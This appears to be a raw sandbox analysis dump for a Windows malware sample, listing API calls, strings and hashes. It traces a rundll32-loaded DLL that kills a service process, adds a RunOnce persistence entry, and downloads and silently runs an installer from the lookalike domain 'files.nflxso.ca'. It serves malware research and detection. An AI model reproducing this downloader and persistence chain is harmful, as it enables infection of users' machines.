                                                                                                                                                                                                              • Instruction ID: bc595db9276cba50870ad01fa2e3c2349eeac688334371df4d894d8954e9036e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46aa90ab370cff26dcf584201a7f8dd8160c3082742fc77ed68c89305273feda
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C417F71A14255AFDB11EB9D9C91AAEFBF8EB84710F1000A7E50497312FB758E40DB90
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00BCF5EA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EncodePointer
                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                              • API String ID: 2118026453-2084237596
                                                                                                                                                                                                              • Opcode ID: 5b9cf06caf7ac281f46df28f38fc3e9de252c1863fc78073b2cf3f71c5183b5e
                                                                                                                                                                                                              • Instruction ID: 8ee57d0b13e35e47f801d7b80e0d24eb222d0b44202a6e5d2ce2c1e26077e67f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b9cf06caf7ac281f46df28f38fc3e9de252c1863fc78073b2cf3f71c5183b5e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B41157290020AAFCF15DF98C981FAEBBB6FF48304F1480E9F915A6265E7359A50DB50
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __aulldiv
                                                                                                                                                                                                              • String ID: 3333
                                                                                                                                                                                                              • API String ID: 3732870572-2924271548
                                                                                                                                                                                                              • Opcode ID: 3b13e274155ec2addd8fb08deaf8594177a17d8cba0e21c3aec01a85280517bd
                                                                                                                                                                                                              • Instruction ID: 6f4be52c4ec8eedd79eb3e9324a007cf6da84f1d4688be6f8bd72630b566c946
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b13e274155ec2addd8fb08deaf8594177a17d8cba0e21c3aec01a85280517bd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17F096323002187BDB24695DCC46BEEBBDDCB847F1F48C026B7099D2D0D5B14804CA99
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:79.3%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:25.9%
                                                                                                                                                                                                              Total number of Nodes:85
                                                                                                                                                                                                              Total number of Limit Nodes:2

                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,?,?,?,?,?,?,6E2B16F2), ref: 6E2B100F
                                                                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,windowsnetservicehelper.exe,00010024,?,?,?,?,?,?,6E2B16F2), ref: 6E2B102B
                                                                                                                                                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,6E2B16F2), ref: 6E2B1041
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,6E2B16F2), ref: 6E2B104B
                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 6E2B106F
                                                                                                                                                                                                              • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,6E2B16F2), ref: 6E2B107B
                                                                                                                                                                                                              • DeleteService.ADVAPI32(00000000,?,?,?,?,?,?,6E2B16F2), ref: 6E2B1087
                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,6E2B16F2), ref: 6E2B1096
                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,6E2B16F2), ref: 6E2B109D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2143507846.000000006E2B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E2B0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143479302.000000006E2B0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143530843.000000006E2B2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143553178.000000006E2B4000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6e2b0000_rundll32.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Service$CloseHandleOpen$ControlDeleteErrorLastManagerQuerySleepStatus
                                                                                                                                                                                                              • String ID: 2$ServicesActive$windowsnetservicehelper.exe
                                                                                                                                                                                                              • API String ID: 2697554486-1059962515
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 6E2B10BC
                                                                                                                                                                                                              • memset.MSVCRT ref: 6E2B10DC
                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 6E2B10F3
                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 6E2B110C
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 6E2B1120
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000009), ref: 6E2B112F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6E2B113E
                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 6E2B114F
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6E2B1159
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 6E2B1160
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • windowsnetservicehelper.exe, xrefs: 6E2B1106
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2143507846.000000006E2B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E2B0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143479302.000000006E2B0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143530843.000000006E2B2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143553178.000000006E2B4000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6e2b0000_rundll32.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseProcessProcess32$ChangeCreateErrorFindFirstHandleLastNextNotificationOpenSnapshotTerminateToolhelp32_wcsicmpmemset
                                                                                                                                                                                                              • String ID: windowsnetservicehelper.exe
                                                                                                                                                                                                              • API String ID: 4188211969-237555702
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WinHttpOpen.WINHTTP(Mozilla/5.0 (Windows) WinHTTP/Gecko Chrome/9999999,00000000,00000000,00000000,00000000,00000000,?,6E2B17E0), ref: 6E2B13CB
                                                                                                                                                                                                              • WinHttpConnect.WINHTTP(00000000,files.nflxso.ca,00000000,00000000,00000000,?,6E2B17E0), ref: 6E2B13E8
                                                                                                                                                                                                              • WinHttpOpenRequest.WINHTTP(00000000,GET,/downloads/winapp/latest-installer.exe,00000000,00000000,?), ref: 6E2B1420
                                                                                                                                                                                                              • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E2B1437
                                                                                                                                                                                                              • WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 6E2B1447
                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 6E2B1462
                                                                                                                                                                                                              • GetTempFileNameW.KERNEL32(?,wnshd,00000000,?), ref: 6E2B1486
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 6E2B14AB
                                                                                                                                                                                                              • WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 6E2B14CE
                                                                                                                                                                                                              • WinHttpReadData.WINHTTP(00000000,?,?,?), ref: 6E2B14FD
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 6E2B151A
                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 6E2B1526
                                                                                                                                                                                                              • WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 6E2B1536
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 6E2B1555
                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 6E2B156C
                                                                                                                                                                                                              • wcscat.MSVCRT ref: 6E2B1590
                                                                                                                                                                                                              • wcscat.MSVCRT ref: 6E2B159F
                                                                                                                                                                                                              • wcscat.MSVCRT ref: 6E2B15BA
                                                                                                                                                                                                              • wcscat.MSVCRT ref: 6E2B15C9
                                                                                                                                                                                                              • memset.MSVCRT ref: 6E2B15DC
                                                                                                                                                                                                              • memset.MSVCRT ref: 6E2B15EE
                                                                                                                                                                                                              • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00800000), ref: 6E2B1613
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00800000,?,?,6E2B17E0), ref: 6E2B1623
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00800000,?,?,6E2B17E0), ref: 6E2B162D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00800000,?,?,6E2B17E0), ref: 6E2B1633
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,00800000,?,?,6E2B17E0), ref: 6E2B163D
                                                                                                                                                                                                              • WinHttpCloseHandle.WINHTTP(00000000), ref: 6E2B164F
                                                                                                                                                                                                              • WinHttpCloseHandle.WINHTTP(00000000), ref: 6E2B1656
                                                                                                                                                                                                              • WinHttpCloseHandle.WINHTTP(00000000,?,6E2B17E0), ref: 6E2B165E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2143507846.000000006E2B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E2B0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143479302.000000006E2B0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143530843.000000006E2B2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143553178.000000006E2B4000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6e2b0000_rundll32.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Http$CloseHandle$Filewcscat$Data$AvailableCreateOpenQueryRequestTempmemset$ConnectDeleteNameObjectPathProcessReadReceiveResponseSendSingleSleepWaitWritewcscpy
                                                                                                                                                                                                              • String ID: /STATUSDAT=$ /VERPOSTFIX=$*/*$/downloads/winapp/latest-installer.exe$D$GET$Mozilla/5.0 (Windows) WinHTTP/Gecko Chrome/9999999$files.nflxso.ca$wnshd$wscsu.exe /S
                                                                                                                                                                                                              • API String ID: 34256906-2308794090
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2143507846.000000006E2B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E2B0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143479302.000000006E2B0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143530843.000000006E2B2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143553178.000000006E2B4000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6e2b0000_rundll32.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: wcscat$mbstowcsstrstr$ExitFileOperationProcessSleepcallocfreememcpymemsetstrchrstrlenwcscpywcslen
                                                                                                                                                                                                              • String ID: \Microsoft\Windows\InetHelper.status$\WindowsNetService$\status.dat$statusdat=$verpostfix=
                                                                                                                                                                                                              • API String ID: 213091988-3107139697
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,00000104,?), ref: 6E2B1269
                                                                                                                                                                                                              • RegCreateKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 6E2B128F
                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 6E2B12AA
                                                                                                                                                                                                              • wcscat.MSVCRT ref: 6E2B12C4
                                                                                                                                                                                                              • wcscat.MSVCRT ref: 6E2B12D2
                                                                                                                                                                                                              • wcscat.MSVCRT ref: 6E2B12EC
                                                                                                                                                                                                              • wcscat.MSVCRT ref: 6E2B12FA
                                                                                                                                                                                                              • wcscat.MSVCRT ref: 6E2B1314
                                                                                                                                                                                                              • wcscat.MSVCRT ref: 6E2B1322
                                                                                                                                                                                                              • wcslen.MSVCRT ref: 6E2B132E
                                                                                                                                                                                                              • RegSetValueExW.KERNEL32(?,cleaninethelper,00000000,00000001,?,00000000), ref: 6E2B1351
                                                                                                                                                                                                              • RegCloseKey.KERNEL32(?), ref: 6E2B135F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2143507846.000000006E2B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E2B0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143479302.000000006E2B0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143530843.000000006E2B2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143553178.000000006E2B4000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6e2b0000_rundll32.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: wcscat$CloseCreateFileModuleNameValuewcscpywcslen
                                                                                                                                                                                                              • String ID: statusdat=$ verpostfix=$",Start$Software\Microsoft\Windows\CurrentVersion\RunOnce$cleaninethelper$rundll32 "
                                                                                                                                                                                                              • API String ID: 411374443-3287171265
                                                                                                                                                                                                              • Opcode ID: 199666a5296ffb6bee18e4474c69ef9014b24be764a6f650e258453f96ff6739
                                                                                                                                                                                                              • Instruction ID: cc46abe5e76747173ffaee154e84072ebed0e48ee8437a4e908e6f6ca91dfa36
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 199666a5296ffb6bee18e4474c69ef9014b24be764a6f650e258453f96ff6739
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9321FCF3D0061DABDF20AAA48D4CEDE767EEF85398F0545A1F609E3101E6709684CBB5
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,759BA130,?,6E2B176C), ref: 6E2B11BF
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,759BA130,?,6E2B176C), ref: 6E2B11CF
                                                                                                                                                                                                              • malloc.MSVCRT ref: 6E2B11DE
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,759BA130,?,6E2B176C), ref: 6E2B11EC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,759BA130,?,6E2B176C), ref: 6E2B11F7
                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000080,00000000,?,?,759BA130,?,6E2B176C), ref: 6E2B1210
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,759BA130,00000000,?,?,759BA130,?,6E2B176C), ref: 6E2B1226
                                                                                                                                                                                                              • free.MSVCRT(00000000,?,?,759BA130,?,6E2B176C), ref: 6E2B1235
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,759BA130,?,6E2B176C), ref: 6E2B123E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2143507846.000000006E2B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E2B0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143479302.000000006E2B0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143530843.000000006E2B2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143553178.000000006E2B4000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6e2b0000_rundll32.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CloseCreateHandle$ReadSizeWritefreemalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1056976453-0
                                                                                                                                                                                                              • Opcode ID: 7cc33332ca552ac87de779690bfeae399ea0cce8278fe43da3c73a4e9ff5a12b
                                                                                                                                                                                                              • Instruction ID: 8bac0053718fadbb44ffb77b3472341b0a568a9ab1a8439c01d61c597479fe7b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7cc33332ca552ac87de779690bfeae399ea0cce8278fe43da3c73a4e9ff5a12b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5311A3B21016257FD62016319C8CF7B3E6EEF9B6F9F100A19F516D20D0D6B05806C670
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 96 6e2b136b-6e2b138e RegOpenKeyExW 97 6e2b13af-6e2b13b3 96->97 98 6e2b1390-6e2b13a9 RegDeleteValueW RegCloseKey 96->98 98->97
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,000F003F,?,00000000,?,?,6E2B17E9), ref: 6E2B1386
                                                                                                                                                                                                              • RegDeleteValueW.KERNEL32(?,cleaninethelper,?,?,6E2B17E9), ref: 6E2B1398
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,6E2B17E9), ref: 6E2B13A9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • cleaninethelper, xrefs: 6E2B1390
                                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 6E2B137C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2143507846.000000006E2B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E2B0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143479302.000000006E2B0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143530843.000000006E2B2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143553178.000000006E2B4000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6e2b0000_rundll32.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$cleaninethelper
                                                                                                                                                                                                              • API String ID: 849931509-2845002033
                                                                                                                                                                                                              • Opcode ID: 5e461e220981720a025537d241a22a407062a436933ac891181b06fd5f466a04
                                                                                                                                                                                                              • Instruction ID: 287e4d0d0495d079d205ed6ff19a5cf0ab8cb9d3f164472610b8c5e86ff409dd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e461e220981720a025537d241a22a407062a436933ac891181b06fd5f466a04
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37E041B2A10719BBDF1557E1CC0DF6E796EDF155997000415B902E7115D571D900D6A0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 99 6e2b116d-6e2b1185 SHGetKnownFolderPath 100 6e2b11a1 99->100 101 6e2b1187-6e2b119f wcscpy CoTaskMemFree 99->101 102 6e2b11a3-6e2b11a5 100->102 101->102
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetKnownFolderPath.SHELL32(6E2B20F0,00000000,00000000,?,?,6E2B20F0,?,6E2B1707), ref: 6E2B117D
                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 6E2B118B
                                                                                                                                                                                                              • CoTaskMemFree.OLE32(?), ref: 6E2B1196
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2143507846.000000006E2B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E2B0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143479302.000000006E2B0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143530843.000000006E2B2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143553178.000000006E2B4000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6e2b0000_rundll32.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FolderFreeKnownPathTaskwcscpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 993388247-0
                                                                                                                                                                                                              • Opcode ID: 43a2c8fac6c582c620219f2603b6b1f11a451d7bf3864be773f3ad0fa035f4d2
                                                                                                                                                                                                              • Instruction ID: 67010ad055691dc63026c32773ba868dc8088cc2b8f4d95e67edcdf4b6a2af34
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43a2c8fac6c582c620219f2603b6b1f11a451d7bf3864be773f3ad0fa035f4d2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5DE048B2974208FFEB045760DC09F9A7AADDF45259F100454F412D5080E6B1AE40D674
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:13.3%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:0.9%
                                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                                              Total number of Limit Nodes:30
calls 21795->21796 21797 7ff75fbc1415 21796->21797 21798 7ff75fbc141d 21797->21798 21799 7ff75fbc145f IsValidCodePage 21797->21799 21803 7ff75fbc1485 memcpy_s 21797->21803 21800 7ff75fbc6b90 _handle_error 8 API calls 21798->21800 21799->21798 21801 7ff75fbc1470 GetCPInfo 21799->21801 21802 7ff75fbc121c 21800->21802 21801->21798 21801->21803 21802->21782 21802->21785 21812 7ff75fbc0f5c GetCPInfo 21803->21812 21877 7ff75fbbff68 EnterCriticalSection 21805->21877 21813 7ff75fbc1085 21812->21813 21814 7ff75fbc0fa5 21812->21814 21816 7ff75fbc6b90 _handle_error 8 API calls 21813->21816 21822 7ff75fbc2328 21814->21822 21818 7ff75fbc1129 21816->21818 21818->21798 21821 7ff75fbbfe88 _snwprintf 40 API calls 21821->21813 21823 7ff75fbb8818 swprintf 35 API calls 21822->21823 21824 7ff75fbc236a MultiByteToWideChar 21823->21824 21826 7ff75fbc23af 21824->21826 21827 7ff75fbc23a8 21824->21827 21828 7ff75fbc23dd memcpy_s _snwprintf 21826->21828 21829 7ff75fbbda58 _snwprintf 16 API calls 21826->21829 21830 7ff75fbc6b90 _handle_error 8 API calls 21827->21830 21832 7ff75fbc244d MultiByteToWideChar 21828->21832 21834 7ff75fbc2488 21828->21834 21829->21828 21831 7ff75fbc1019 21830->21831 21836 7ff75fbbfe88 21831->21836 21833 7ff75fbc246e GetStringTypeW 21832->21833 21832->21834 21833->21834 21834->21827 21835 7ff75fbbda18 __free_lconv_mon 15 API calls 21834->21835 21835->21827 21837 7ff75fbb8818 swprintf 35 API calls 21836->21837 21838 7ff75fbbfead 21837->21838 21841 7ff75fbbfb2c 21838->21841 21842 7ff75fbbfb6e _snwprintf 21841->21842 21843 7ff75fbbfb92 MultiByteToWideChar 21842->21843 21844 7ff75fbbfbc4 21843->21844 21852 7ff75fbbfe3d 21843->21852 21846 7ff75fbbfbfc _snwprintf 21844->21846 21849 7ff75fbbda58 _snwprintf 16 API calls 21844->21849 21845 7ff75fbc6b90 _handle_error 8 API calls 21847 7ff75fbbfe4b 21845->21847 21848 7ff75fbbfc60 MultiByteToWideChar 21846->21848 21861 7ff75fbbfd11 21846->21861 21847->21821 21850 7ff75fbbfc86 21848->21850 21848->21861 21849->21846 21868 
